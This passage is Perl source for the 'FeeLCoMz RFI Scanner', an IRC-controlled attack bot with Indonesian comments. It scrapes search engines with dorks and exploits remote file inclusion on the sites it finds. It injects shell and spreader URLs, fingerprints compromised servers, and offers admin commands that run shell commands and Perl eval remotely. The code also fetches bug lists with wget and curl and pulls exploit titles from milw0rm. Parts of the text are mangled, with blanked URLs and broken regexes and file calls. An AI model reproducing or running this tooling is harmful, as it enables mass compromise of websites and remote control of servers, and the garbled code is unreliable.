my $q = bukasitus($url);
if ( $q =~ /Open Directory Sites<\/b><\/font> \((.+?) of (.+?)\)/ ) {
my $h = $2; $h =~ s/,//g; msgt($chan,"Dmoz","$h");
if ( $q =~ /Next<\/a>\">/ ) {
my $nxurl = $1; msgn($dbgchan,"Dmoz","$nxurl");
while ( $q =~ m/
# Next<\/a>/ ) {
$nxurl = $murl.htmltourl($1);
$q = bukasitus($nxurl);
while ( $q =~ m/

# (.*?) risultati per / ) {
my $h = $1; $h =~ s/,//g; $h =~ s/\.//g;
if ( $q =~ /Avanti/ ) {
my $nxurl = $1; msgn($dbgchan,"Virgilio","$nxurl");
while ( $q =~ m/

Avanti/ ) {
$nxurl = $murl.htmltourl($1);
$q = bukasitus($nxurl);
while ( $q =~ m/
<= $max; $p += $num ) { my $url = "".$p."&su=".$key."&y=0&x=0&mc=suche\@web\@navigation\@zahlen.suche\@web"; my $q = bukasitus($url); while ( $q =~ m/http:\/\/(.*?)<\/span>/g ) { push (@daftar, $1); }
if ( $q !~ /http:\/\/(.*?)<\/span>/ ) { return @daftar; }
return @daftar;
sub se_fireball {
my ($chan,$key,$nf) = @_;
my @daftar;
my $num = 1; my $max = 500; my $p;
for ( $p = 0;$p <= $max; $p += $num ) { my $url = "".$p."&query=".$key."&cat=fb_web&enc=utf-8"; my $q = bukasitus($url); while ( $q =~ m/<= $max; $p += $num ) { my $url = "".$key."&ps=&loc=searchbox&tab=web&mode=search&currProv=msn&page=".$p; my $q = bukasitus($url); while ( $q =~ m/http:\/\/(.+?)<\/span>/g ) {
my $l = $1 ; if ($l !~ /hotbot/) { push (@daftar, $l); }
if ( $q !~ /http:\/\/(.+?)<\/span>/ ) { return @daftar; }
return @daftar;
## NETSCAPE (Ga pake) ##
sub se_netscape {
my ($chan,$key,$nf) = @_;
my @daftar;
my $num = 1; my $max = 10; my $p;
for ( $p = 0;$p <= $max; $p += $num ) { my $url = "".$key."&page=".$p."&y=0&x=0&st=webresults"; my $q = bukasitus($url); while ( $q =~ m/url\">http:\/\/(.*?)<\/p>/g ) {
my $l = $1 ; if ($l !~ /search.netscape/) { push (@daftar, $l); }
if ( $q !~ /url\">http:\/\/(.*?)<\/p>/ ) { return @daftar; }
return @daftar;
sub se_webcrawler {
my ($chan,$key,$nf) = @_;
my @daftar;
my $num = 50; my $max = 500; my $p;
for ( $p = 0;$p <= $max; $p++ ) { $num += $num; my $url = "".$key."/qcoll=relevance/zoom=off/bepersistence=true/qi=".$num."/qk=50/page=".$p."/_iceUrlFlag=11?_IceUrl=true"; my $q = bukasitus($url); while ( $q =~ m/status='http:\/\/(.*?)';/g ) { my $l = $1 ; if ($l !~ /webcrawler|google/) { push (@daftar, $l); } } if ( $q !~ /wsPagerNext/ ) { return @daftar; } } return @daftar; } ## EUROSEEK ## sub se_euroseek { my ($chan,$key,$nf) = @_; my @daftar; my $num = 10; my $max = 6000; my $p; for ( $p = 0;$p <= $max; $p+=$num ) { my $url = "".$p."&string=".$key; my $q = bukasitus($url); while ( $q =~ m//g ) { push (@daftar, $1); }
if ( $q !~ /Next/ ) { return @daftar; }
return @daftar;
## ABACHO ##
sub se_abacho {
my ($chan,$key,$nf) = @_;
my @daftar;
my $num = 10; my $max = 1000; my $p = 0;
for ( $p = 0;$p <= $max; $p += $num ) { my $url = "".$p."&poffset=0&StartCounter=".$p."&q=".$key."&a=&b=&country=it&page=&d_html=&d_pdf=&d_msdoc=&d_xls=&d_ppt=&mesearchkey=&cluster=&coop="; my $q = bukasitus($url); while ( $q =~ m/target=\"_blank\">http:\/\/(.+?)<\/a>/g ) { push (@daftar, $1); }
if ( $q !~ m/target=\"_blank\">http:\/\/(.+?)<\/a>/g ) { return @daftar; }
if ( $q =~ /We didn't find any results matching your query/ ) { return @daftar; }
return @daftar;

##[ BUG JOOMLA ]##
sub bugjoomla {
my $mode = $_[0];
my @bugz;
system("lwp-download ".$joomlaz);
system("curl -O ".$joomlaz);
system("wget ".$joomlaz);
open(FILE,"< baris =" 0;" buff ="~" r =" ) { $r =~ s/\n//g; push(@bugz,$r); }
return @bugz;

##[ MILW0RM ]##
sub milw0rm {
my ($chan,$key) = @_;
my $max = 10; my $i;
#my $q = bukasitus("http://localhost/milw0rm_rfi.htm");
my $q = bukasitus("".urlen($key));
irc_msg($chan," 0,1 [ ] 9 $key ");
while ( $q =~ m/(.*?)<\/a>/g ) {
my ($exp,$judul) = ($1,$2);
irc_msg($chan,$colz{1}." $judul 15$exp ");
return if ($i == $max);

sub bersihdork {
my ($chan,$dork) = @_;
if ( $dork =~ /inurl:|allinurl:|intext:|allintext:|intitle:|allintitle:/ ) {
irc_msg($chan,$colz{1}." Membersihkan kata kunci Google.. ");
$dork =~ s/^inurl://g;
$dork =~ s/^allinurl://g;
$dork =~ s/^intext://g;
$dork =~ s/^allintext://g;
$dork =~ s/^intitle://g;
$dork =~ s/^allintitle://g;
return $dork;

sub lnk_sortir {
my @unik = ();
my %ada = ();
foreach my $e ( @_ ) {
next if $ada{ $e }++;
push (@unik, $e);
return @unik;

sub lnk_filter {
my @unik = ();
foreach my $url ( @_ ) {
my $jelek = 0;
foreach my $b ( @badlinkz ) {
if ($url =~ /$b/) { $jelek = 1; }
if ($jelek == 0) { push (@unik, $url); }
return @unik;

##[ SUBLINK ]##
sub lnk_sub {
my $link = $_[0];
my (@links,$path);
my ($host,@paths) = split(/\//,$link);
$host .= "/";
push (@links,$host);
foreach my $e (@paths) {
if ($e) {
$path .= $e."/";
my $sublink = $host.$path;
push (@links,$sublink);
return @links;

##[ INFO OS ]##
sub info_os {
my $url = $_[0];
my @info;
my $h = bukasitus($url.$fx29id2."??");
my ($safe,$os,$uname,$server,$user,$uid,$dir,$perm,$hdd,$disfunc);
while ( $h =~ m/
SAFE: (.+?)
/g ) { $safe = $1; }
while ( $h =~ m/
OS: (.+?)
/g ) { $os = $1; }
while ( $h =~ m/
UNAME: (.+?)
/g ) { $uname = $1; }
while ( $h =~ m/
SERVER: (.+?)
/g ) { $server = $1; }
while ( $h =~ m/
USER: (.+?)
/g ) { $user = $1; }
while ( $h =~ m/
UID: (.+?)
/g ) { $uid = $1; }
while ( $h =~ m/
DIR: (.+?)
/g ) { $dir = $1; }
while ( $h =~ m/
PERM: (.+?)
/g ) { $perm = $1; }
while ( $h =~ m/
HDD: (.+?)
/g ) { $hdd = $1; }
while ( $h =~ m/
DISFUNC: (.+?)
/g ) { $disfunc = $1; }
push (@info,$safe,$os,$uname,$server,$user,$uid,$dir,$perm,$hdd,$disfunc);
return @info;

sub safemode {
my ($type,$chan,$situs,$bug,$engine) = @_;
my $safemode; my $vurn; my $sb;
if ($type == 1) { $vurn = "http://".$situs.$bug; $sb = $vurn." 14".$fx29sh."?"; }
else { $vurn = $situs; $sb = $vurn; }
my ($safe,$os,$uname,$server,$user,$uid,$dir,$perm,$hdd,$disfunc) = info_os($vurn);
if ($safe =~ /OFF/) { $safemode = " 4OFF"; } elsif ($safe =~ /ON/) { $safemode =" 9ON"; } else { $safemode =" 0-"; }
if ($disfunc) { $disfunc = " 9[ Disfunc ] 0[ 7 $disfunc 0]"; } else { $disfunc = ""; }
if ($perm =~/W/) { $perm = " 12$perm"; } else { $perm = " 4$perm"; }
my $S1 = " 9,1 [ ".$safemode." 9] 9[ $os ] 0[ $sb 0] ";
my $S2 = " 9,1 [ Uname ] 0[ $uname ] 9 [ User ] 0[ $user / $uid ] 9[ Server ] 0[ $server ] ";
my $S3 = " 9,1 [ Dir ] 0[ $dir $perm 0] 9[ HDD ] 0[ 0 $hdd 0] $disfunc ";
if ($type == 1) {
irc_msg($chanx,$S1); irc_msg($chanx,$S2); irc_msg($chanx,$S3);
my $q = bukasitus($vurn.$spread."?&modez=shellz");
if ($q =~ /Writed to (.+?)!/) { irc_msg($chanx," 9,1 [ Shell ] 0[ $1 0] "); }
irc_msg($chan,$colz{3}.$engine.$colz{4}) if ($engine);
irc_msg($chan,$S1); irc_msg($chan,$S2); irc_msg($chan,$S3);

##[ CEK SHELL ]##
sub cek_shell {
my ($chan,$nick,$situs) = @_;
my $q = bukasitus($situs.$fx29id."?");
print $q;
if ( $q =~ /FeeLCoMz/ ) { safemode(2,$chan,$situs,"",""); }
else { irc_msg($chan,$nick.", targetnya BozoK cOOOk!"); }

##[ CEK RESPON ]##
sub cek_respon {
my $chan = $_[0];
my ($q1,$q2,$q3) = (bukasitus($fx29id),bukasitus($fx29id2),bukasitus($fx29sh));
my ($rid,$rid2,$rsh,$stat);
if ( $q1 =~ /Fx29ID/ ) { $rid = " 0OK "; $stat = 1; } else { $rid = " 4ERROR! "; $stat = 0; }
if ( $q2 =~ /Fx29ID/ ) { $rid2 = " 0OK "; $stat += 1; } else { $rid2 = " 4ERROR! "; $stat += 0; }
if ( $q3 =~ /FaTaLisTiCz_Fx/ ) { $rsh = " 0OK "; } else { $rsh = " 4ERROR! "; }
irc_msg($chan,$colz{1}."Fx29ID: $rid 9Fx29ID2: $rid2 9Fx29Sh: $rsh".$colz{2});
return $stat;

##[ CEK DORK ]##
sub cek_dork {
my $dork = $_[0];
foreach my $d (@baddorkz) { if ($dork =~ /$d/) { return 1; } }
return 0;

##[ CEK BUG ]##
sub cek_bug {
my $bug = $_[0];
foreach my $b (@badbugz) { if ($bug =~ /$b/) { return 1; } }
return 0;

sub f_hapus { my $file = $_[0]; system("rm $file"); }
sub f_simpan {
my ($nf,$hc) = @_;
my $fh;
open( $fh, ">>", $nf );
my @slink = lnk_sub($hc);
foreach my $s (@slink) { print $fh "$s\n"; }
close $fh;
sub f_simpan2 {
my ($nf,$isi) = @_;
my $fh;
open( $fh, ">", $nf ); print $fh "$isi\n"; close $fh;
sub f_simpan2b {
my ($nf,$isi) = @_;
my $fh;
open( $fh, ">>", $nf ); print $fh "$isi\n"; close $fh;

##[ HTTP QUERY ]##
sub bukasitus {
my $url = $_[0];
my $request = HTTP::Request->new(GET => $url);
my $ua = LWP::UserAgent->new;
my $response = $ua->request($request);
if ($response->is_success) { return $response->content; }
else { return $response->status_line; }
sub bukasitus2 {
my $url = $_[0];
my $ua = LWP::UserAgent->new;
my $response = $ua->get($url);
if ($response->is_success) { return $response->content; }
else { return $response->status_line; }
sub bukasitus3 {
my $url = $_[0];
my $host = $url;
my $query = $url;
my $isi; my $kirim;
my $uagent = "Mozilla/5.0";
$host =~ s/http:\/\/([-a-zA-Z0-9\.]+)\/.*/$1/;
$query =~ s/$host//;
eval {
my $sock = IO::Socket::INET->new(PeerAddr => "$host",PeerPort => "80",Proto => "tcp") || return;
$kirim = "GET ".$query." HTTP/1.1\r\nHost: ".$host."\r\nAccept: */*\r\nUser-Agent: ".$uagent."\r\n\r\n";
print $sock $kirim;
my @r = <$sock>;
$isi = "@r";
return $isi;

sub htmltourl { my $str = $_[0]; $str =~ s/&/&/g; return $str; }
sub urlen {
my $str = $_[0];
#$str =~ s/\+/\%2B/g;
$str =~ s/ /\+/g;
$str =~ s/@/\%40/g;
$str =~ s/\//\%2F/g;
$str =~ s/&/\%26/g;
$str =~ s/\"/\%22/g;
$str =~ s/,/\%2C/g;
$str =~ s/\\/\%5C/g;
$str =~ s/:/\%3A/g;
$str =~ s/\[/\%5B/g;
$str =~ s/\]/\%5D/g;
$str =~ s/\?/\%3F/g;
$str =~ s/\=/\%3D/g;
$str =~ s/\|/\%7C/g;
return $str;
sub urlde {
my $str = $_[0];
$str =~ s/\+/ /g;
$str =~ s/\%2B/\+/g;
$str =~ s/\%40/@/g;
$str =~ s/\%2E/\./g;
$str =~ s/\%2F/\//g;
$str =~ s/\%26/&/g;
$str =~ s/\%22/\"/g;
$str =~ s/\%2C/,/g;
$str =~ s/\%5C/\\/g;
$str =~ s/\%3A/:/g;
$str =~ s/\%5[B|b]/\[/g;
$str =~ s/\%5[D|d]/\]/g;
$str =~ s/\%3F/\?/g;
$str =~ s/\%3D/\=/g;
$str =~ s/\%7C/\|/g;
return $str;
sub cryptz { return crypt($_[0],"feelcomz"); }

sub trimrn {
my $str = $_[0];
if (!$str) { return ""; }
$str =~ s/\r// if ($str);
$str =~ s/\n//;
return $str;

##[ INFO BOT ]##
sub bot_info {
my $chan = $_[0];
my $hlogo = " 0,1 [ i ] 9 ";
my $uname = `uname -a`;
my $uid = `id`;
my $uptime = `uptime`;
my @info = (
$hlogo." 0FeeLCoMz RFI Scanner $versi Info ",
$hlogo."Written under 0ActivePerl 5.8.8 Build 820 9by 0FaTaLisTiCz_Fx (FeeLCoMz Community) ",
$hlogo."Uname: 0 $uname ",
$hlogo."Uid: 0 $uid ",
$hlogo."Uptime: 0 $uptime ",
foreach my $m(@info) { irc_msg($chan,$m); }

##[ HELP BOT ]##
sub bot_help {
my ($chan,$level) = @_;
my $hsepz = " 0,1 [ ! ] 0";
my $hlogo = " 0,1 [ ! ] 9".$cmdpre;
my @help; my $i;
my @hlp1 = (
$hsepz."FeeLCoMz RFI Scanner $versi Help ",
$hlogo."scan|scan2 0? 15 Memulai scanner | scanner & Eksploit RFI ",
$hlogo."milw0rm 0? 15 Mencari daftar bug di milw0rm ",
$hlogo."respon 0? 15 Cek Respon & Injector RFI ",
$hlogo."urlen|urlde 0? 15 Encoder/Decoder URL ",
$hlogo."cek 0? 15 Cek RFI shell ",
$hlogo."info 0? 15 Informasi bot ",
$hlogo."auth 0? 15 Login ke bot ",
my @hlp2 = (
$hsepz."User Commands: ",
$hlogo."joomla 0? 15 Memulai scanner & Eksploit RFI Joomla ",
$hlogo."hitung 0? 15 Mengganti hitungan proses eksploitasi ",
$hlogo."cryptz 0? 15 Membuat password yg terenkripsi ",
$hlogo."join|part 0? 15 Join/Part channel ",
$hlogo."nick 0? 15 Ganti nick bot ",
$hlogo."logout 0? 15 Logout dari bot ",
my @hlp3 = (
$hsepz."Admin Commands: ",
$hlogo."crespon[1/2]|cshell|cspread 0? 15 Mengganti respon/injector/spread/spread2 RFI ",
$hlogo."rfipid 0? 15 Mengganti RFI PID ",
$hlogo."spy 0? 15 Menampilkan konfigurasi Spy ",
$hlogo."spyhost 0? 15 Channel host buat spy ",
$hlogo."spychan 0? 15 Channel yang akan di spy ",
$hlogo."spyword 0? 15 Kata yg di akan spy ",
$hlogo."raw 0? 15 Perintah Raw IRC ",
$hlogo."cmd 0? 15 Mengeksekusi perintah di shell ",
$hlogo."eval 0? 15 Mengeksekusi kode perl ",
$hlogo."quit 0? 15 Quit dari IRC ",
$hlogo."keluar 0? 15 Quit dari IRC & Matikan semua proses Perl ",
if ( $level == 1 ) { push(@help,@hlp1); }
elsif ( $level == 2 ) { push(@help,@hlp2); }
elsif ( $level == 3 ) { push(@help,@hlp3); }
foreach my $m (@help) { irc_msg($chan,$m); $i++; if ( $i % $conf{linez} == 0 ) { sleep($conf{sleepz}); } }

sub msge { my ($chan,$se,$res) = @_; irc_msg($chan," 7,1 ".$se." 15 ".$res." "); }
sub msgi { my ($chan,$judul,$info) = @_; irc_msg($chan," 0,1 [ $judul ] 9 $info "); }
sub msgn { my ($chan,$se,$nxurl) = @_; irc_msg($chan," 8,1 ".$se." 15 ".$nxurl." "); }
sub msgr { my ($chan,$se,$totr,$clr) = @_; irc_msg($chan," 9,1 ".$se." 15 ".$totr." 0 ".$clr." "); }
sub msgt { my ($chan,$se,$res) = @_; irc_msg($chan," 3,1 ".$se." 15 ".$res." "); }
sub ntci { my ($chan,$judul,$info) = @_; irc_ntc($chan," 0,1 [ $judul ] 9 $info "); }

sub irc_raw { my $data = $_[0]; print $sock "$data\r\n"; }
sub irc_nick { my $nick = $_[0]; irc_raw("NICK $nick"); }
sub irc_user { my $ident = $_[0]; irc_raw("USER $ident localhost * :FeeLScaNz $versi"); }
sub irc_msg { my ($to,$psn) = @_; irc_raw("PRIVMSG $to :$psn"); }
sub irc_act { my ($to,$psn) = @_; irc_raw("PRIVMSG $to : ACTION $psn "); }
sub irc_ntc { my ($to,$psn) = @_; irc_raw("NOTICE $to :$psn"); }
sub irc_join { my $to = $_[0]; irc_raw("JOIN $to"); }
sub irc_part { my $to = $_[0]; irc_raw("PART $to"); }
sub irc_quit { my $psn = $_[0]; irc_raw("QUIT :$psn"); exit; }

##[ FeeLCoMz Community ]##

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